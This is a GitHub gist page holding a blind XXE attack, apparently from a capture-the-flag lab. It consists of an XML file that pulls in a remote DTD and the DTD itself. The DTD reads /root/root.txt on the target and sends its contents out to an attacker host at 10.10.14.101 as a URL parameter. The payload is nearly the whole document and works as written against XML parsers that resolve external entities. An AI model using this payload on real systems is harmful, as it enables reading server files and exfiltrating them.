Skip to content

Instantly share code, notes, and snippets.

@kavishkagihan

kavishkagihan/blind-xxe.md

Created July 21, 2022 14:23
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save kavishkagihan/0fddd2cb28918021d5689ea14138ca02 to your computer and use it in GitHub Desktop.
Save kavishkagihan/0fddd2cb28918021d5689ea14138ca02 to your computer and use it in GitHub Desktop.
Download ZIP
Blind XXE attack using a dtd file to read files
Raw
blind-xxe.md
  • kavi_creds.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM 'http://10.10.14.101/kavi.dtd'> %xxe;]>
<credits>
  <author>&xxe;</author>
</credits>
  • kavi.dtd
<!ENTITY % file SYSTEM "file:///root/root.txt">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://10.10.14.101/?flag=%file;'>">
%eval;
%exfiltrate;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment